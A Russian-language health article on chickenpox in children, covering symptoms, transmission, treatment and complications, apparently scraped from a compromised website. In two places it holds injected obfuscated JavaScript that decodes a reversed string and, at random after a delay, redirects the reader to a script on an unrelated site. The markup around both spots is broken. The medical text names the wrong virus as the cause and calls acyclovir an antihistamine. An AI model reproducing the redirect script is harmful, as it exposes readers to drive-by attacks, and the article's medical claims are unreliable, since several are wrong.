Ветрянка у детей: фото, симптомы и признаки, лечение и последствия

Трудно вспомнить более распространенное заболевание у детей, чем ветрянка. Это название знакомо каждому из нас с самого детства, как и первейший и наивернейший визуальный ее признак: как только во дворах появляются дети в зеленую крапинку, можете быть уверены — в садики и школы пришла ветряная оспа. Чтобы воремя распознать симптомы и начать лечение малыша, стоит помнить о некотрых моментах.

Что такое ветряная оспа и почему ей чаще болеют дети

Ветрянка или ветряная оспа возбуждается вирусом простого герпеса, который поражает клетки кожи и слизистой. Всего, кстати, насчитывают шесть видов вируса герпеса, к которым относится и вирус ветряной оспы и опоясывающего герпеса. Переболев этой болячкой в детстве, мы не изгоняем вирус герпеса из организма полностью, он остается в нашем организме, не в силах перебороть укрепившийся за время болезни иммунитет. Вирус до поры до времени скрывается в нервных клетках, перейдя в латентное состояние, но спустя несколько десятилетий он может активироваться на фоне ослабленного иммунитета, переохлаждения и стрессового состояния в форме опоясывающего лишая или опоясывающего герпеса в определенном участке тела.

Вирус герпеса очень летучий, но во внешней среде не живет дольше часа. Это говорит о том, что заразиться ветрянкой можно только при непосредственном контакте, а не через предметы, например, и не через третье лицо.

Прелесть заключается в том, что болеют этим заболеванием чаще всего раз в жизни. После того, как ребенок переболеет, к вирусу вырабатывается устойчивый иммунитет. Да и протекает заболевание достаточно легко, если, конечно, ею болеть в детском возрасте. У взрослого человека заболевание протекает тяжело и может сопровождаться осложнениями.

Заразиться можно воздушно-капельным путем через дыхательные пути и слизистые оболочки глаз, «по ветру», отчего, видимо, такое название болезнь и получила. Заболевание дети «приносят» из садика или из школы и, как правило, до десяти — двенадцати лет. Ветрянка очень заразная, и редко когда кому-то в одном детском коллективе удается не заразиться, обычно болеют все. Именно поэтому лечение начинается с карантина, хотя на Западе существует устойчивое мнение, что не стоит изолировать ребенка — лучше пусть переболеет ветряной оспой в раннем возрасте.

Симптомы и признаки заболевания + фото у детей

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/04/vetryanka-u-detey-1.jpg» alt=»Ветрянка у детей фото» width=»444″ height=»307″ /> Ветрянка у детей

После заражения может пройти несколько недель, прежде чем ветрянка даст о себе знать в виде симптомов. Инкубационный период может составлять до трех недель. Начинается болезнь с того, что у ребенка резко повышается температура почти до сорока градусов и высыпает сыпь. Именно сочетание этих двух симптомов, проявляющихся одновременно, и позволяет отличить ветрянку от ОРЗ. Помимо этого, недуг сопровождает ощущение общей слабости и головная боль разной интенсивности.

Высыпания на коже выглядят как розовые маленькие пятнышки неинтенсивной окраски плоские. Количество таких высыпаний за несколько часов вырастает в разы, причем пятнышки увеличиваются в объеме, становятся выпуклыми, постепенно превращаясь в пузырьки с жидкостью внутри. Такие высыпания могут появляться везде — на коже, на слизистых, на гениталиях, даже во рту. К тому же пузырьки эти очень сильно чешутся, но нельзя допустить, чтобы ребенок расчесывал их, поскольку в этом случае в ранку может попасть инфекция.

Мнение эксперта: Не только поэтому. Также в содержимом пузырьков находится огромное количество активных вирусов, которые с лёгкостью будут распространяться при контакте.

Пузырьки появляются и проходят, а затем в течение трёх-четырех дней появляются новые — высыпания проходят словно волнами. Волдыри заживают, на их месте образуются корочки, после отпадания которых следов не останется, если не отковыривать их самостоятельно до заживления.

Ветряная оспа у детей в картинках: как может выглядеть сыпь

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»21928,21926,21924,21922″]

Лечение ветрянки

Поскольку ветрянка имеет вирусное происхождение, лечение сопровождается приемом антибиотиков только в том случае, если в течение болезни присоединяется еще и инфекция. В этом случае пузырьки начинают гноиться — это происходит, если ребенок расчесывает высыпания.

Во время болезни ребенку лучше соблюдать постельный режим, тем более, что начало заболевания связано с высокой температурой. Как такового лечения не существует, но важно провести ряд мероприятий, направленных на облегчение ее протекания. Во-первых, важно соблюдать санитарно-гигиенические требования: менять постельное белье, чтобы исключить новые высыпания, не мочить сыпь, чтобы не отдалять момент выздоровления. Однако, можно кратковременно принимать ванны со слабым раствором марганца. Европейские доктора, впрочем, прописывают ребенку регулярный душ во время болезни, чтобы не допустить инфицирования ранок.

При ветрянке необходимо соблюдать диету, исключающую из пищи возможные аллергены. Лучше, если питание будет состоять из молочной и растительной пищи. Также ребенку необходимо постоянное обильное питье, особенно при высокой температуре, чтобы избежать обезвоживания организма. Накормить и напоить ребенка в период болезни очень тяжело, поскольку пропадает аппетит.

Для снятия жара применяют жаропонижающие средства, но лучше избегать аспирина и лекарств на его основе. Лучше всего давать ребенку парацетамол и его производные, поскольку он действует и как жаропонижающее, и как противовоспалительное. Против зуда можно использовать небольшую дозировку антигистаминных препаратов типа диазолина или ацикловира.

Мнение эксперта: Ацикловир не является антигистаминным средством . Это противовирусный препарат. Чаще всего на данный момент используют фенкарол и лоратадин, конечно можно пользоваться тавегилом и супрастином. Димедрол детям не назначают.

Старой доброй традицией осталось смазывание высыпаний при ветрянке зеленкой. Конечно, это не является лечением — смазывание зеленкой пузырьков при ветряной оспе лишь защищает их от попадания в них инфекции, что тоже очень важно, и смазанные зеленкой пузырьки меньше зудят. Вместо зеленки пузырьки можно смазывать раствором марганцовки. Ни в коем случае нельзя смазывать пузырьки спиртом.

Мнение эксперта: Можно смазывать пузырьки спиртом. Никаких противопоказаний нет. Только никто этого не делает по одной простой причине. При обработке цветными антисептическими растворами заметны новые подсыпания, что очень важно, поскольку на 5-ый день после последних высыпаний пациент перестаёт быть заразным. При обработке спиртом высыпаний нельзя проследить динамики.

Последствия детского недуга

После того, как ребенок переболел, в случае, если в результате несоблюдения санитарно-гигиенических норм все же было допущено инфицирование, на месте пузырьковых высыпаний могут остаться рубцы. Более тяжелых последствий заболевания почти не встречается. Одно из редких — это энцефаломиелит или воспаление головного мозга.

Более опасна в плане последствий ветрянка врожденная — когда мама болеет ею во время беременности. Профилактическим средством от этого может стать прививка, если человек ещё ни разу не болел ветряной оспой.

Материал актуализирован 17.04.2017

Adblock
detector